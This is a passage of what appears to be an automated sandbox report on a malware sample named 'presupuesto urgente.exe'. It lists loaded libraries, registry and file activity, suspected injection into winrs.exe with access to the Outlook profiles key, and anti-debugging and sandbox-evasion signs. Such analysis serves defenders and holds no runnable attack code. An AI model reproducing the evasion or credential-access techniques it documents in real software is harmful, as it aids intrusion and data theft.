        Source: C:\Windows\SysWOW64\winrs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: wsmsvc.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: dsrole.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: pcwum.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeFile written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Gaulin.iniJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: presupuesto urgente.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: winrs.pdbGCTL source: presupuesto urgente.exe, 00000002.00000003.8323727937.0000000003598000.00000004.00000020.00020000.00000000.sdmp, qnFwqCOYxcUlZ.exe, 00000003.00000003.8423230370.00000000012D1000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: presupuesto urgente.exe, 00000002.00000001.8031630233.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qnFwqCOYxcUlZ.exe, 00000003.00000002.12649228198.000000000058E000.00000002.00000001.01000000.0000000B.sdmp
        Source: Binary string: wntdll.pdbUGP source: presupuesto urgente.exe, 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8266535897.0000000033358000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8263145257.00000000331A3000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.12651416729.0000000003900000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.12651416729.0000000003A2D000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.8358482622.000000000374C000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.8355000605.0000000003593000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: presupuesto urgente.exe, presupuesto urgente.exe, 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8266535897.0000000033358000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8263145257.00000000331A3000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.12651416729.0000000003900000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.12651416729.0000000003A2D000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.8358482622.000000000374C000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.8355000605.0000000003593000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: winrs.pdb source: presupuesto urgente.exe, 00000002.00000003.8323727937.0000000003598000.00000004.00000020.00020000.00000000.sdmp, qnFwqCOYxcUlZ.exe, 00000003.00000003.8423230370.00000000012D1000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: presupuesto urgente.exe, 00000002.00000001.8031630233.0000000000649000.00000020.00000001.01000000.00000007.sdmp

        Data Obfuscation

        barindex
        Source: Yara matchFile source: 00000002.00000002.8355119953.0000000002B38000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.8108880079.00000000045E8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335308CD push ecx; mov dword ptr [esp], ecx2_2_335308D6
        Source: C:\Users\user\Desktop\presupuesto urgente.exeFile created: C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\presupuesto urgente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\Desktop\presupuesto urgente.exeAPI/Special instruction interceptor: Address: 45F967A
        Source: C:\Users\user\Desktop\presupuesto urgente.exeAPI/Special instruction interceptor: Address: 2B4967A
        Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE97C8D144
        Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE97C8D604
        Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE97C8D764
        Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE97C8D324
        Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE97C8D364
        Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE97C8D004
        Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE97C8FF74
        Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE97C8D864
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33571763 rdtsc 2_2_33571763
        Source: C:\Windows\SysWOW64\winrs.exeWindow / User API: threadDelayed 9156Jump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\presupuesto urgente.exeAPI coverage: 0.3 %
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe TID: 5776Thread sleep time: -115000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe TID: 5776Thread sleep count: 43 > 30Jump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe TID: 5776Thread sleep time: -64500s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe TID: 5776Thread sleep count: 54 > 30Jump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe TID: 5776Thread sleep time: -54000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exe TID: 780Thread sleep count: 122 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\winrs.exe TID: 780Thread sleep time: -244000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exe TID: 780Thread sleep count: 9156 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\winrs.exe TID: 780Thread sleep time: -18312000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\winrs.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 0_2_004066F3 FindFirstFileW,FindClose,0_2_004066F3
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 0_2_00405ABE CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405ABE
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
        Source: winrs.exe, 00000004.00000002.12649540671.0000000003256000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9(
        Source: presupuesto urgente.exe, 00000002.00000003.8263739558.0000000003540000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000002.8361890120.0000000003540000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000002.8361386340.00000000034F2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000005.00000002.8695253898.000001A431D5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: firefox.exe, 00000005.00000002.8695253898.000001A431D5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
        Source: qnFwqCOYxcUlZ.exe, 00000003.00000002.12650037876.00000000012CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`%E^
        Source: C:\Users\user\Desktop\presupuesto urgente.exeAPI call chain: ExitProcess graph end nodegraph_0-4671
        Source: C:\Users\user\Desktop\presupuesto urgente.exeAPI call chain: ExitProcess graph end nodegraph_0-4513
        Source: C:\Windows\SysWOW64\winrs.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33571763 rdtsc 2_2_33571763
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 0_2_00402F14 GetTempPathW,GetTickCount,GetModuleFileNameW,GetFileSize,LdrInitializeThunk,GlobalAlloc,CreateFileW,0_2_00402F14
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356A350 mov eax, dword ptr fs:[00000030h]2_2_3356A350
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33528347 mov eax, dword ptr fs:[00000030h]2_2_33528347
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33528347 mov eax, dword ptr fs:[00000030h]2_2_33528347
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33528347 mov eax, dword ptr fs:[00000030h]2_2_33528347
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AE372 mov eax, dword ptr fs:[00000030h]2_2_335AE372
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AE372 mov eax, dword ptr fs:[00000030h]2_2_335AE372
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AE372 mov eax, dword ptr fs:[00000030h]2_2_335AE372
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AE372 mov eax, dword ptr fs:[00000030h]2_2_335AE372
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335B0371 mov eax, dword ptr fs:[00000030h]2_2_335B0371
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335B0371 mov eax, dword ptr fs:[00000030h]2_2_335B0371
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355237A mov eax, dword ptr fs:[00000030h]2_2_3355237A
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353B360 mov eax, dword ptr fs:[00000030h]2_2_3353B360
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353B360 mov eax, dword ptr fs:[00000030h]2_2_3353B360
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353B360 mov eax, dword ptr fs:[00000030h]2_2_3353B360
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353B360 mov eax, dword ptr fs:[00000030h]2_2_3353B360
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353B360 mov eax, dword ptr fs:[00000030h]2_2_3353B360
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353B360 mov eax, dword ptr fs:[00000030h]2_2_3353B360
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356E363 mov eax, dword ptr fs:[00000030h]2_2_3356E363
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356E363 mov eax, dword ptr fs:[00000030h]2_2_3356E363
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356E363 mov eax, dword ptr fs:[00000030h]2_2_3356E363
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356E363 mov eax, dword ptr fs:[00000030h]2_2_3356E363
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356E363 mov eax, dword ptr fs:[00000030h]2_2_3356E363
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356E363 mov eax, dword ptr fs:[00000030h]2_2_3356E363
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356E363 mov eax, dword ptr fs:[00000030h]2_2_3356E363
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356E363 mov eax, dword ptr fs:[00000030h]2_2_3356E363
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3354E310 mov eax, dword ptr fs:[00000030h]2_2_3354E310
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3354E310 mov eax, dword ptr fs:[00000030h]2_2_3354E310
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3354E310 mov eax, dword ptr fs:[00000030h]2_2_3354E310
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356631F mov eax, dword ptr fs:[00000030h]2_2_3356631F
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33529303 mov eax, dword ptr fs:[00000030h]2_2_33529303
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33529303 mov eax, dword ptr fs:[00000030h]2_2_33529303
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335EF30A mov eax, dword ptr fs:[00000030h]2_2_335EF30A
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33603336 mov eax, dword ptr fs:[00000030h]2_2_33603336
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335B330C mov eax, dword ptr fs:[00000030h]2_2_335B330C
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335B330C mov eax, dword ptr fs:[00000030h]2_2_335B330C
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335B330C mov eax, dword ptr fs:[00000030h]2_2_335B330C
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335B330C mov eax, dword ptr fs:[00000030h]2_2_335B330C
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33568322 mov eax, dword ptr fs:[00000030h]2_2_33568322
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33568322 mov eax, dword ptr fs:[00000030h]2_2_33568322
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33568322 mov eax, dword ptr fs:[00000030h]2_2_33568322
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355332D mov eax, dword ptr fs:[00000030h]2_2_3355332D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352E328 mov eax, dword ptr fs:[00000030h]2_2_3352E328
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352E328 mov eax, dword ptr fs:[00000030h]2_2_3352E328
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352E328 mov eax, dword ptr fs:[00000030h]2_2_3352E328
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335633D0 mov eax, dword ptr fs:[00000030h]2_2_335633D0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335643D0 mov ecx, dword ptr fs:[00000030h]2_2_335643D0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335B43D5 mov eax, dword ptr fs:[00000030h]2_2_335B43D5
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352E3C0 mov eax, dword ptr fs:[00000030h]2_2_3352E3C0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352E3C0 mov eax, dword ptr fs:[00000030h]2_2_3352E3C0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352E3C0 mov eax, dword ptr fs:[00000030h]2_2_3352E3C0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352C3C7 mov eax, dword ptr fs:[00000030h]2_2_3352C3C7
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335363CB mov eax, dword ptr fs:[00000030h]2_2_335363CB
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355A390 mov eax, dword ptr fs:[00000030h]2_2_3355A390
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355A390 mov eax, dword ptr fs:[00000030h]2_2_3355A390
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355A390 mov eax, dword ptr fs:[00000030h]2_2_3355A390
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33531380 mov eax, dword ptr fs:[00000030h]2_2_33531380
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33531380 mov eax, dword ptr fs:[00000030h]2_2_33531380
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33531380 mov eax, dword ptr fs:[00000030h]2_2_33531380
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33531380 mov eax, dword ptr fs:[00000030h]2_2_33531380
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33531380 mov eax, dword ptr fs:[00000030h]2_2_33531380
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3354F380 mov eax, dword ptr fs:[00000030h]2_2_3354F380
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3354F380 mov eax, dword ptr fs:[00000030h]2_2_3354F380
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3354F380 mov eax, dword ptr fs:[00000030h]2_2_3354F380
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3354F380 mov eax, dword ptr fs:[00000030h]2_2_3354F380
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3354F380 mov eax, dword ptr fs:[00000030h]2_2_3354F380
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3354F380 mov eax, dword ptr fs:[00000030h]2_2_3354F380
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335EF38A mov eax, dword ptr fs:[00000030h]2_2_335EF38A
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AC3B0 mov eax, dword ptr fs:[00000030h]2_2_335AC3B0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335393A6 mov eax, dword ptr fs:[00000030h]2_2_335393A6
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335393A6 mov eax, dword ptr fs:[00000030h]2_2_335393A6
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AD250 mov eax, dword ptr fs:[00000030h]2_2_335AD250
